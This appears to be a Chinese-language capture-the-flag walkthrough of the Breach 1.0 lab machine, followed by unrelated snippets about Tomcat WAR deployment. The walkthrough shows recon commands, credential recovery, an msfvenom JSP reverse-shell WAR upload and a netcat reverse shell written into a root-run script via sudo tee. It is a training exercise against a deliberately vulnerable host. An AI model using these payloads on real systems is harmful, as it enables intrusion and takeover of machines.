breach1.0 tomcat war远程部署
环境准备
靶机链接:百度网盘 请输入提取码
提取码:vq1h
虚拟机网络链接模式:仅主机模式
攻击机系统:kali linux 2021.1
信息收集
1.探测目标靶机开放端口和服务
nmap -p- 192.168.110.140
2.用gobuster扫描下目录
gobuster dir -u http://192.168.110.140 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -t 100 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak
3.查询网页源码
curl -i -L http://192.168.110.140
4.俩次base64解密后得到 pgibbon:damnitfeel$goodtobeagang$ta
5.访问下扫出的这个目录后,发现一张图片 可能存在隐藏信息
http://192.168.110.140/breach.html
6.将图片下载下来,查看隐藏信息
wget http://192.168.110.140/images/bill.png
strings bill.png
coffeestains
漏洞利用
1.访问网页发现一个cms系统
2.尝试登录
用户名:pgibbons
密码:damnitfeel$goodtobeagang$ta
3.查看邮件信息发现KeyStore是一个存储库,可用于存储一系列密钥(Secret Key)、密钥对(Key Pair)或证书
4.随便点后发现content
5.找到一个pcap文件,并且告诉了密码是tomcat
5.用keytool工具对keystore解密
keytool -importkeystore -srckeystore /home/weiqin/下载/keystore -destkeystore /home/weiqin/下载/keystore.p12 -deststoretype pkcs12 -srcalias tomcat
6.将新证书导入到wireshark
7.导入成功就能看到数据
Credentials: tomcat:Tt\5D8F(#!*u=G)4m7zB
https://192.168.110.140:8443/_M@nag3Me/html
8.访问下地址,访问失败,数据是正常的应该能访问到的,用bp抓包,放包来登录;并发现是一个basic认证。
9.用户名密码登录成功
tomcat:Tt\5D8F(#!*u=G)4m7zB
10.登录进去可以上传war包,用msfvenom生成war包
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.128 LPORT=4444 -f war > shell1.war
11.成功反弹shell(手速要快,不然会失败)
目录
环境准备
信息收集
漏洞利用
权限提升
1.在家目录下啥也没有发现
2.在网站目录下发现一个5446很奇怪,查看后发现一个php文件。
3.查看发现数据库用户名,密码为空
cat 0d93f85c5061c44cdffeb8381b2772fd.php
4.mysql -uroot -p 成功登录
6.看到一个user表
select * from tables.user;
7.查看后,发现一段密文,用md5解密下。
milton 6450d89bd3aff1d893b85d3ad65d2ec2
8.成功登录milton用户
thelaststraw
9.查看历史执行记录,发现登陆过一个用户blumbergh。
之前在图片中找到的英文就是这个用户密码!
sudo-l 执行后可以不用密码执行下面俩个命令
10.向tidyup.sh中写入反弹shell命令
tidyup.sh文件是root权限,tee命令能够写命令,那么用tee命令写tidyup.sh里。
echo 'nc -e /bin/bash 192.168.110.128 5555' > shell.txt
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
11.反弹shell成功
breach1.0 tomcat war远程部署相关推荐
- springboot 2.x tomcat war包部署 localhost-startStop-1 启动卡顿卡死
大家好,我是烤鸭: 关于springboot war包部署tomcat. 环境: springboot 2.0.3.RELEASE apache-tomcat-8.5.32 1. 修改pom & ...
- Linux环境下服务器 Tomcat war包部署步骤
当前工作环境是 Tomcat 8.5.31 1.常规方式 1.通过IDE打包成war 2.上传到tomcat里webapps目录下 3.重启Tomcat Note:这里注意的url后添加项目名,也就是 ...
- Tomcat WAR包部署getshell
变量名 含义 host 数据库地址 username 数据库访问用户名 password 数据库访问密码 dbname 数据库名 connection 连接 query 数据库执行语句 result ...
- IDEA + Tomcat + war 包部署 [ 如果看别的教程不行请看这个里 ]
首先确保项目没问题能正常启动 点这个 很神奇吧! 对没错很有可能就是你刚才删掉的那个 图上有字看到了吗? 要不是这样请从新选择别的项目 , 或者还教程吧! 我这个恐怕不行了 . 再见! 换成这个 , ...
- idea插件tomcat8-maven-plugin远程部署项目~
简介: 在项目中时常需要部署项目,在程序员的工作中大部分时间,不是再解决bug,就是在部署项目的路上,有得时候各种各样的环境,部署时间就占用了一大半. 解决方案: 1.开启tomcat的远程部署,修改 ...
- 使用IntelliJ IDEA 集成阿里提供的 Alibaba Cloud Toolkit插件,实现自动化远程部署Java项目(jar包,war包两种方式)
打开IntelliJ IDEA编译器,点击文件==>点击设置(setting) 在设置页面点击插件(英文应该是 Plugins ,对IntelliJ IDEA汉化感兴趣的同学可以在这个页面搜索 ...
- 打包tomcat没有xml文件_Spring Boot 项目打包 War 并部署到 Tomcat
之前使用 SpringBoot 所做的开发,都是将项目打包成 Jar 的,但是如果是作为一个 Web 项目,最好是将项目打包成 War. 1. Jar 包和 War 包的区别 1.概念 jar 包:J ...
- Spring Boot(三) 将war文件部署到tomcat 、 Thymeleaf示例
Spring Boot(三) 将war文件部署到tomcat . Thymeleaf示例 一 . 将war文件部署到tomcat 对于Spring Boot WAR部署,需要执行三个步骤: 扩展Spr ...
- IntelliJ IDEA2017创建web工程并实现远程部署tomcat
利用IDEA远程部署项目到Tomcat服务器 原来在eclipse下将项目导出为war包后往往需要将war包上传到服务器,进行部署,但IDEA提供了方便易用的远程部署方案,下面一起来看看把. 远程部署 ...
最新文章
- 仓央嘉措《那一天,那一月,那一年,那一世》
- IoC容器总结与简单模拟
- Ubuntu共享WiFi(AP)给Android方法
- FFmpeg4.1编译:mac+android-ndk-14b+ffmpeg4.1成功编译
- Python隐藏属性
- linux 协议栈 位置,[置顶] Linux协议栈代码阅读笔记(一)
- 查看Hive SQL执行日志
- Java并发基础总结_Java并发编程笔记之基础总结(二)
- web.xml文件报红,怎么解决???
- android rxbus 一个页面监听,Android RxBus的使用
- catia如何整列加工_非标零件如何用机器检测?能像人类一样查出问题吗?
- 达内java晨讲案例_达内java飞机大战(完成版)
- 清华山维eps软件_cass3D三维立体数据采集软件
- NLP文本情感——SNOWNLP简易版
- 物理计算机仿真实验报告,大学物理实验实验报告模板
- Eviews的基本使用,简单线性回归分析
- LayoutInflater类的作用与用法
- html5 plus 保存图片,H5+app点击图片保存到相册
- android自定义view(三)绘制表格和坐标系
- SEE MIPS RUN 第六章 内存管理与TLB